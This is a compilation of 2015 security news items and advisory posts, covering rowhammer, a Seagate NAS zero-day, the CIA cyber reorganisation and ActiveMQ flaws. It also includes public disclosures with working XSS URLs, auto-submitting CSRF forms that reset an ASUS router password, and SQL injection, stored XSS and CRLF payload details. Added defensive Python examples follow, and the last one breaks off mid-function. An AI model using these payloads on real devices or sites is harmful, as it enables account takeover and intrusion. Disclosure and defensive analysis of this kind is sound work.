  11. Software, from web apps, to operating systems to firmware, has been abused and exploited every which way from Sunday for decades by both researchers and attackers. Now, it is hardware’s turn in the spotlight, as researchers have published details of a new method for exploiting a problem with some DRAM memory devices that can allow attackers to get low-level access to target machines. The problem is being called “rowhammer”, as it’s a method for repeatedly hammering on rows of cells of memory in DRAM devices to induce cells to flip from one state to another. Using a new technique to exploit the rowhammer issue, researchers at Google were able to produce these bit flips in cells and gain kernel-level privileges. Security researchers say the technique is some of the more important work done on exploitation in recent years and could affect a huge number of laptops and desktop machines. “[it] is a brilliant attack and because it’s a hardware flaw, there are really no ways to patch it,” said Alfredo Ortega, a longtime security researcher and co-founder of Groundworks Technologies. Researcher Mark Seaborn on Monday published a detailed technical explanation of techniques to exploit the rowhammer issue, which was described earlier in an academic paper by researchers from Intel and Carnegie Mellon University. The basic concept behind rowhammer relies on the fact that the cells of memory on DRAM devices have become closer and closer together over time, meaning that it has become more difficult to prevent electrons from jumping from one cell to another. By accessing target cells in DRAM over and over again, an attacker can disturb a cell adjacent to the target cells, causing it to “bit flip” under some circumstances. “‘Rowhammer’ is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. 
We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process,” Seaborn wrote in his post. “When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.” Seaborn tested his technique on 29 different machines with several different CPUs and DRAM from several vendors and observed a bit flip in 15 cases. However, he stressed that the lack of an observed bit flip does not mean that the DRAM isn’t necessarily exploitable. “While an absence of bit flips during testing on a given machine does not automatically imply safety, it does provide some baseline assurance that causing bit flips is at least difficult on that machine,” Seaborn said. Ortega said that the new technique is effective thanks to the way that DRAM devices are designed now. “Modern memory is flawed, vendors cut corners a lot to save power and make cheap tiny chips, so if you access too quickly a section of it, or if you turn on and off a memory cell too quickly, the adjacent memory cells will also be affected,” he said. “The trick is to find a memory cell that stores something important and that you cannot access for security reasons, for example a memory cell storing a password, or file permissions, and then flip a cell next to it. Eventually the memory cell will flip, even if you don’t have access to it.” Mitigating rowhammer attacks is possible, Seaborn said. For example, manufacturers can make sure that when a system refreshes DRAM memory that it doesn’t activate a given row too often without also refreshing nearby rows. 
The rowhammer issue is not unknown to DRAM manufacturers, as some of them may already have implemented some mitigations. “Looking backward, had there been more public disclosures about the rowhammer problem, it might have been identified as an exploitable security issue sooner. It appears that vendors have known about rowhammer for a while, as shown by the presence of rowhammer mitigations in LPDDR4. It may be that vendors only considered rowhammer to be a reliability problem,” Seaborn said. Security researcher Dan Kaminsky, chief scientist of White Ops, said that the attack is effective in a surprising number of cases. “This sort of bug fills memory — the grand collection of buckets in your computer — with lots and lots of areas where checks for God like power depend on the bucket being empty. Then it shakes specially chosen buckets — ‘aggressor buckets’ — to try to leak a 1 into all those 0’s. And on a surprising amount of hardware, it works,” Kaminsky said via email. However, one good defense against the attack is the use of ECC memory, which has extra bits to help correct errors. ECC is more expensive, though, and mainly is used in servers rather than laptops and desktops, said researcher Robert Graham of Errata Security. “The biggest threat at the moment appears to be to desktops/laptops, because they have neither ECC memory nor virtual machines. In particular, there seems to be a danger with Google’s native client (NaCl) code execution. This a clever sandbox that allows the running of native code within the Chrome browser, so that web pages can run software as fast as native software on the system. This memory corruption defeats one level of protection in NaCl. Nobody has yet demonstrated how to use this technique in practice to fully defeat NaCl, but it’s likely somebody will discover a way eventually,” Graham said. 
The new techniques, Seaborn said, are a good example of why manufacturers and researchers should be paying close attention to hardware vulnerabilities. “History has shown that issues that are thought to be ‘only’ reliability issues often have significant security implications, and the rowhammer problem is a good example of this. Many layers of software security rest on the assumption the contents of memory locations don’t change unless the locations are written to,” he said. “Though the industry is less accustomed to hardware bugs than to software bugs, we would like to encourage hardware vendors to take the same approach: thoroughly analyse the security impact of ‘reliability’ issues, provide explanations of impact, offer mitigation strategies and — when possible — supply firmware or BIOS updates. Such discussion will lead to more secure hardware, which will benefit all users.”

Source
  12. Seagate, over the weekend, confirmed the zero-day vulnerability in its Seagate Business Storage 2-Bay NAS boxes disclosed March 1. But in the same breath, it told customers exposed to the vulnerability that a patch is still two months away. “For those customers who choose to keep their networks open, Seagate will be issuing a software patch for download expected May 2015,” said a statement emailed to Threatpost.

Seagate said that after analyzing the vulnerability, it has determined the zero-day to be low risk because it affects only those customers who expose the NAS boxes to the Internet. “With factory settings, Business NAS products are not vulnerable. The user has to intentionally change a default setting to become susceptible,” Seagate said. Seagate has built a website for concerned customers with instructions on how to mitigate exposure, and encouraged users to put the NAS boxes behind a firewall when using them exclusively on internal networks.

The vulnerability was publicly disclosed a week ago Sunday by Australian security consultancy Beyond Binary after five months of dialogue with Seagate that failed to produce a security update for the firmware issue in question, the researchers said. Beyond Binary said it used a Shodan scan to find 2,500 vulnerable devices exposed to the Internet. Beyond Binary said Seagate boxes running firmware versions up to and including 2014.00319 are vulnerable and exploitable without authorization.

The issue stems from a number of outdated components upon which the NAS products’ web-based management application is built. The app is used to manage files, access control and user accounts. The outdated components include versions of PHP and Lighttpd from 2010 and a version of CodeIgniter from late 2011, all of which have their own set of vulnerabilities that have been addressed in later versions of the respective components.
Hackers can abuse each of these to lace the code with additional files and executables, or extract an encryption key to open up new avenues of attack, Beyond Binary said. The custom web app is not without its issues too as it stores information relevant to a user session inside a session cookie rather than on the webserver. Some of those values include the name of the user, whether they’re an admin and the language. “The fact that a static session encryption key is in use across all instances of the NAS means that once a user has a valid session cookie on one instance, they can apply that same cookie directly to another instance and acquire the same level of access,” the advisory said. “In short, once a user is logged in as admin on one instance, they’re effectively admin on every instance.” Source
  13. IN THE CIA’S mission of global influence and espionage, its hackers have just been elevated to a powerful new role. On Friday afternoon, CIA director John Brennan publicly issued a memo to the agency’s staff calling for a massive re-organization of its hierarchy and priorities. And center stage in the CIA’s new plans is a new Cyber Directorate that will treat “cyber”—in federal-speak, hackers and hacking—as a major new focus for both offense and defense. “Digital technology holds great promise for mission excellence, while posing serious threats to the security of our operations and information, as well as to U.S. interests more broadly,” Brennan’s memo reads. “We must place our activities and operations in the digital domain at the very center of all our mission endeavors. To that end, we will establish a senior leadership position to oversee the acceleration of digital and cyber integration across all of our mission areas.” The CIA’s interest in hacking isn’t new: After all, it’s known to have actively participated in the mission to disable Iranian nuclear facilities using the Stuxnet malware, in partnership with the NSA and Israeli intelligence. But more than ever, those sorts of digital elements are being integrated into the CIA’s human intelligence operations, says Jim Lewis, a fellow at the Center for Strategic and International Studies who has had conversations with intelligence and military officials over the last year about the plans for the CIA’s digital overhaul. Those “humint” operations, as the intelligence community calls them, typically involve real spies on the ground, unlike the NSA’s remote cyberespionage or the cyberwarfare activities of the Pentagon’s Cyber Command. “This kind of cyber activity has become increasingly important to them,” says Lewis. “It’s not NSA’s [signals intelligence] mission; it’s not Cyber Command’s war fighting mission. It’s traditional espionage using cyber techniques,” says Lewis. 
That combination of humint and digital operations could mean a spy infiltrating an organization to plant spyware by hand, for instance, or a digital investigation to check the bona fides of a source or agent. “If you think of NSA as a vacuum cleaner and Cyber Command as a hammer, this is a little more precise, and it’s about supporting human operations.” The CIA’s announcement represents yet another sign that cyber-offense is gaining importance for practically every intelligence and military agency. The FBI late last year asked for new rules of criminal procedure that would vastly expand its power to hack into the computers of criminal suspects. And we know from Snowden leaks that the NSA has built the world’s most powerful hacking organization, pulling off high-resource operations that have rarely been seen elsewhere in the cybersecurity world. The NSA’s most recent operations reportedly include hacking SIM card manufacturer Gemalto and planting insidious malware in the firmware of hard drives. But Lewis argues that the CIA announcement is also intended to help the CIA shift from its paramilitary role during the wars in Iraq and Afghanistan into more of a peacetime espionage role, where digital spying will be doubly important. “They’ve been involved in armed conflict and operating drones,” says Lewis. “Now they have to go back to old-school spying, recruiting agents, getting people to tell you secrets in a peaceful environment.” Brennan’s announcement is also intended largely as a personnel move, says Alan Paller, research director for the SANS Institute, which educates and evaluates the cybersecurity skills of many government staffers. “His reorg is at least 80 percent about…giving the cybersecurity mission more of a front and center position and equal authority, rather than a technical support role at the beck and call of intelligence analysts,” Paller says. 
That new level of prestige and opportunity for the CIA’s hackers, says Paller, will be crucial to recruiting in an age where human minds, not stockpiles of weapons, can decide foreign conflicts. “Only extraordinarily skilled cyber defenders and cyber operators can enable a unit or a business or a nation to survive,” Paller says. “You cannot train your way to supremacy. You have to recruit people with the right brain wiring and invest heavily in constantly building their skills. Those correctly wired people are rare.” Source
  14. Two critical bugs in the commonly used Apache ActiveMQ open source messaging and Integration Patterns server are leaving businesses open to denial-of-service (DoS) and brute force cyber attacks. Researchers at MWR InfoSecurity Labs reported identifying the bugs, warning they affect Apache ActiveMQ versions 5.0.0 to 5.10.0 and Apache ActiveMQ Apollo versions 1.0 to 1.7. The flaws reportedly stem from the way Apache ActiveMQ performs Lightweight Directory Access Protocol (LDAP) authentication.

"A vulnerability was identified in ActiveMQ in the way it handles content-based subscriptions, which allows an adversary to trigger processing of XML external entities (XXE)," read the advisory. "Apache ActiveMQ Apollo, which is another MQ implementation built for reliability and performance and originally based on ActiveMQ, was also found to be affected by this vulnerability." The researchers added the flaws are dangerous as they could be exploited for a variety of purposes. "In order to successfully exploit this vulnerability, an attacker has to act on behalf of both a publisher and a consumer," read the advisory. "An attacker who is able to push and pull from a message queue can use this flaw to perform DTD-based DoS attacks, server-side request forgery or read local files, accessible to the user running the MQ broker, from the server."

It is currently unclear whether hackers are actively exploiting the flaw. MWR InfoSecurity had not responded to V3's request for comment at the time of publishing. The flaw is dangerous as Apache ActiveMQ is a commonly used open source message broker service. Written in Java, Apache ActiveMQ is designed to facilitate communications between multiple clients or servers. The news follows the discovery of several critical flaws affecting other commonly used open source tools and services. Researchers reported uncovering the notorious Heartbleed flaw in April 2014.
Heartbleed is a flaw in the OpenSSL implementation of the Transport Layer Security protocol used by open source web servers such as Apache and Nginx, which host around 66 percent of all sites. In a recent interview with V3, Maarten Ectors, Canonical's vice president of next-generation networks and proximity cloud, argued the nature of open source software development means further Heartbleed-level flaws will be discovered in the very near future. Source
  15. Michigan-based provider of point-of-sale devices, NEXTEP SYSTEMS, is investigating a possible security compromise of customer systems, according to a statement emailed to SCMagazine.com on Monday by Tommy Woycik, president of NEXTEP SYSTEMS. “NEXTEP was recently notified by law enforcement that the security of the systems at some of our customer locations may have been compromised,” according to the statement, which goes on to add, “We do know that this is NOT affecting all NEXTEP customers, and we have been working with our customers to ensure that any issues are addressed.” An investigation is ongoing with law enforcement and data security experts. On Monday, technology journalist Brian Krebs reported that financial industry sources identified a pattern of fraud on payment cards used recently at Zoup!, a restaurant chain and NEXTEP SYSTEMS customer. He wrote that Zoup! referred him to NEXTEP SYSTEMS. Source
  16. Hello list! There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities in ASUS Wireless Router RT-G32.

-------------------------
Affected products:
-------------------------

The vulnerable model is ASUS RT-G32 with different versions of firmware. I checked ASUS RT-G32 with firmware versions 2.0.2.6 and 2.0.3.2.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work both via GET and via POST (they work even without authorization).

ASUS RT-G32 XSS-1.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="next_page" value="'+alert(document.cookie)+'">
<input type="hidden" name="group_id" value="'+alert(document.cookie)+'">
<input type="hidden" name="action_script" value="'+alert(document.cookie)+'">
<input type="hidden" name="flag" value="'+alert(document.cookie)+'">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

The CSRF vulnerability allows changing different settings, including the admin's password, as I showed in this exploit (post-auth).
ASUS RT-G32 CSRF-1.html

<html>
<head>
<title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="action_mode" value="+Apply+">
</form>
</body>
</html>

I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansk regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many of my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/7644/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Source
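Server-side checks that close both holes described in the post above, added here as an example and not ASUS firmware code: an Origin/Referer check plus a session-bound token against the auto-submitted CSRF form, and JavaScript-string encoding for the parameters that are reflected between single quotes in a script. The handler shape, ROUTER_HOST, the session key and the hidden csrf_token field are assumptions for the illustration.

```python
"""Hardening checks for a router's start_apply.htm handler (added example).

Assumptions (not from the advisory): the handler receives request headers
and POST fields as dicts, ROUTER_HOST is the address the admin UI is served
on, and the UI embeds a per-session CSRF token as a hidden field.
"""
import hmac
import json
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

ROUTER_HOST = "192.168.1.1"   # constructed: where the admin UI is served


def same_origin(headers: Dict[str, str], router_host: str = ROUTER_HOST) -> bool:
    """CSRF check 1: the browser must report that the POST came from the router's own pages.

    A form auto-submitted from another site (the CSRF-1.html pattern) carries
    that site's Origin/Referer, or none at all, and is rejected either way.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return parts.scheme in ("http", "https") and parts.hostname == router_host


def issue_csrf_token(session_key: bytes, form_name: str) -> str:
    """CSRF check 2: a token derived from the login session, embedded by the UI."""
    return hmac.new(session_key, form_name.encode(), "sha256").hexdigest()


def csrf_token_ok(session_key: bytes, form_name: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted hidden field against the expected token."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_csrf_token(session_key, form_name), submitted)


def js_string(value: str) -> str:
    """Encode a value for a JavaScript string context.

    The advisory's sink reflects parameters between single quotes inside a
    script, so HTML-escaping alone is the wrong tool: JSON encoding keeps the
    payload a literal, and the extra escapes stop '</script>' from closing the block.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def handle_apply(headers: Dict[str, str], form: Dict[str, str],
                 session_key: bytes, authenticated: bool) -> Tuple[int, str]:
    """Return (status, body) for a start_apply.htm POST."""
    if not authenticated:
        return 401, "login required"       # the post notes the sink worked unauthenticated
    if not same_origin(headers):
        return 403, "cross-site request rejected"
    if not csrf_token_ok(session_key, "start_apply", form.get("csrf_token")):
        return 403, "missing or stale CSRF token"
    # Settings may be applied here; the reflected value is encoded for its context.
    return 200, "var next_page = " + js_string(form.get("next_page", "")) + ";"
```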
  17. *WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id Parameter SQL Injection Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
WooThemes

*Product & Version:*
WordPress Daily Edition Theme v1.6.2

*Vendor URL & Download:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/

*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management."

"Unique Features
These are some of the more unique features that you will find within the theme:
A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives.
A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"

*(2) Vulnerability Details:*
The WordPress Daily Edition Theme web application has a security bug. It can be exploited by SQL Injection attacks. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

*(2.1)* The code flaw occurs at the "fiche-disque.php?" page with the "&id" parameter.

*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/27
http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

Source

*WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities*

Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src Parameter Unrestricted Upload of File Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
WooThemes

*Product & Version:*
WordPress Daily Edition Theme v1.6.2

*Vendor URL & Download:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/

*Product Introduction:*
"Daily Edition WordPress Theme developed by wootheme team and Daily Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay. With loads of home page modules to enable/disable and a unique java script-based featured scroller and video player the theme oozes sophistication"

"The Daily Edition theme offers users many options, controlled from the widgets area and the theme options page – it makes both the themes appearance and functions flexible. From The Daily Edition 3 option pages you can for example add your Twitter and Google analytics code, some custom CSS and footer content – and in the widgets area you find a practical ads management."

"Unique Features
These are some of the more unique features that you will find within the theme:
A neat javascript home page featured slider, with thumbnail previews of previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags, in order of most commented to least commented. A great way to highlight posts gathering dust in the archives.
A customizable home page layout with options to specify how many full width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!"

*(2) Vulnerability Details:*
The WordPress Daily Edition Theme web application has a security bug. It can be exploited by "Unrestricted Upload of File" (Arbitrary File Uploading) attacks. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote or local host. This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host.

*(2.1)* The code flaw occurs at the "thumb.php?" page with the "src" parameter.

*References:*
http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/4
http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

Source
  18. Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin

Overview
Title: Stored XSS Vulnerability in Google Analytics by Yoast Wordpress Plugin
Author: Kaustubh G. Padwad, Rohit Kumar.
Plugin Homepage: https://yoast.com/wordpress/plugins/google-analytics/
Severity: Medium
Version Affected: Version 5.3.2 and mostly prior to it
Version Tested: Version 5.3.2
Version patched:

Description

Vulnerable Parameters
Current UA-Profile
Manually enter your UA code
Label for those links
Set path for internal links to track as outbound links:
Subdomain tracking:
Extensions of files to track as downloads:

About Vulnerability
This plugin is vulnerable to a Stored Cross Site Scripting vulnerability. The issue is exploitable by administrator users with access to the "Google Analytics by Yoast" settings in WordPress; the parameters listed above are vulnerable to stored XSS. A malicious administrator can hijack other users' sessions, take control of another administrator's browser or install malware on their computer.

Vulnerability Class
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

Steps to Reproduce (POC):
After installing the plugin, go to Settings --> Google Analytics by Yoast.
Input this payload in "Manually enter your UA code":
v style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x
Click on the Save Changes button and move your cursor to the input box; you will see the XSS in action.
Reload the page or re-navigate to the page to make sure it is stored.

Mitigation
https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits

Change Log
https://github.com/Yoast/google-analytics-for-wordpress/pull/322/commits

Disclosure
22-February-2015 Reported to developer
25-February-2015 Fixed by developer
05-March-2015 Issue Closed with team.
06-March-2015 Public Disclosure

Credits
Kaustubh Padwad & Rohit Kumar
Information Security Researchers
kingkaustubh@me.com & kumarrohit2255@gmail.com
@s3curityb3ast, @rkumars3c
http://breakthesec.com
https://www.linkedin.com/in/kaustubhpadwad

Source
  19. ***********************************************************************************
** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability
** Exploit Author: Peyman D. aka C4T
** Vendor Homepage: http://query.yahooapis.com/
** Google Dork: none
** Date: 2015-03-08
** Tested on: Windows 7 / Mozilla Firefox
***********************************************************************************

** Exploit Code:

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<span>Discovered by Peyman D.</span>
<span>aka C4T</span>
<script>
alert('Successfully Exploited');
</script>
</body>
</html>

***********************************************************************************

Location & Vulnerable query:

http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html'

***********************************************************************************

** Proof:

Executable script tag in the API's own page:
Malicious source: http://hatrhyme.com/alert.html
Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html'

-------------------------------------------------------

Injecting HTML tags in the API's own page:
Malicious source: http://hatrhyme.com/expl.html
Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html'

-------------------------------------------------------

***********************************************************************************
** Explanation and the cause of this vulnerability:
** http://hatrhyme.com/XSSInYQL.pdf
***********************************************************************************

Source
  20. # Exploit Title: OpenKM Platform Remote Reflected Cross Site Scripting
# Google Dork: N/A
# Date: 18-11-2014
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)
# Vendor Homepage: http://www.openkm.com/en/
# Software Link: http://www.openkm.com/en/download-english.html
# Version: All versions < 6.4.19 (built 23338)
# Tested on: All OS
# CVE : 2014-9017

-About OpenKM
OpenKM is a Free/Libre document management system that provides a web interface for managing arbitrary files. OpenKM includes a content repository, Lucene indexing, and jBPM workflow. The OpenKM system was developed using Java technology. In 2005 two developers involved in open source technologies and expertise with some commercial document management solutions (Sharepoint, Documentum, Hummingbird, among others) like Excalibur search engine or Kofax OCR engine decided to start an open source project based on high level technologies to build a document management system that they decided to call OpenKM. "-Wikipedia"
-Reference: http://en.wikipedia.org/wiki/OpenKM

-Vulnerability: Remote Reflected/Stored Cross Site Scripting with no remote interaction
-Severity: Very Critical
-Vulnerable Parameter(s)/Input(s): Tasks
-Info: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
-Impact: Remote Admin or Users Full Account Takeover with no interaction.

-Attack Scenario:
1. User#1 "Attacker": Creates a task with a vulnerable name and assigns it to another User/Admin "Targeted Victim".
2. User#2 "Victim": Gets exploited by the vulnerable task made by the Attacker "User#1", since the task notification automatically appears on the assigned user's ("Victim") side; the notification popup displays the vulnerable task name and the victim is exploited with no interaction.

-PS: This is the most critical attack you will see on the OpenKM platform because it works remotely against users; with the same scenario described in the report you can steal/execute JS in the Administrator's session.

-PoC Video: http://youtu.be/3jBQFAAq23k

Thanks

--
Best Regards,
Mohamed Abdelbaset Elnoby
Guru Programmer, Information Security Evangelist & Bug Bounty Hunter.
LinkedIn: https://www.linkedin.com/in/symbiansymoh
Curriculum Vitae: http://goo.gl/cNrVpL
Facebook: https://fb.com/symbiansymoh
Twitter: https://twitter.com/symbiansymoh

Source
  21. *NetCat CMS Multiple HTTP Response Splitting (CRLF) Security Vulnerabilities*

Exploit Title: NetCat CMS Multiple CRLF Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1
Tested Version: 3.12
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of CRLF Sequences ('CRLF Injection') [CWE-93]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
NetCat

*Product & Version:*
NetCat 5.01 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1

*Vendor URL & Download:*
NetCat can be obtained from here,
http://netcat.ru/

*Product Introduction:*
NetCat.ru is a Russian local company.
"NetCat designed to create an absolute majority of the types of sites: from simple "business card" with a minimum content to complex web-based systems, from corporate offices to online stores, libraries or media data - in other words, projects completely different directions and at any level of complexity. View examples of sites running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user, because it does not require knowledge of Internet technologies, programming and markup languages. NetCat constantly improving, adds new features. In the process of finalizing necessarily take into account the wishes of our partners and clients, as well as trends in Internet development. More than 2,000 studios and private web developers have chosen for their projects is NetCat, and in 2013 sites, successfully working on our CMS, created more than 18,000."

*(2) Vulnerability Details:*
The NetCat web application has a security bug. It can be exploited by HTTP Response Splitting (CRLF) attacks. This could allow a remote attacker to insert arbitrary HTTP headers, which are included in a response sent to the server. If an application does not properly filter such a request, it could be used to inject additional headers that manipulate cookies, authentication status, or more.

*(2.1)* The first code flaw occurs at the "/post.php" page with the "redirect_url" parameter by adding "%0d%0a%20".

*(2.2)* The second code flaw occurs at the "redirect.php?" page with the "url" parameter by adding "%0d%0a%20".

*References:*
http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html
http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/8
http://packetstormsecurity.com/files/130584/NetCat-CMS-5.01-Open-Redirect.html

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

Source
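A defender-side companion to the CRLF flaw described in the advisory above, added here as an example and not NetCat's own code: it shows the unsafe header construction the advisory implies, a validated replacement for a "redirect_url"/"url" parameter that refuses CR/LF and off-site targets, and a scan of access-log lines for the encoded "%0d%0a" marker. The handler shape, SITE_HOST, the Apache-style log format and the sample log lines are assumptions constructed for the illustration.

```python
"""Rejecting and detecting CRLF injection in a redirect parameter (added example).

Assumptions (not from the advisory): a handler that redirects to the value of
a "redirect_url" or "url" query parameter, SITE_HOST as the only host a
redirect may stay on, and access logs in the common Apache-style format.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

SITE_HOST = "cms.example"   # constructed: the host redirects may stay on


def vulnerable_redirect(redirect_url: str) -> bytes:
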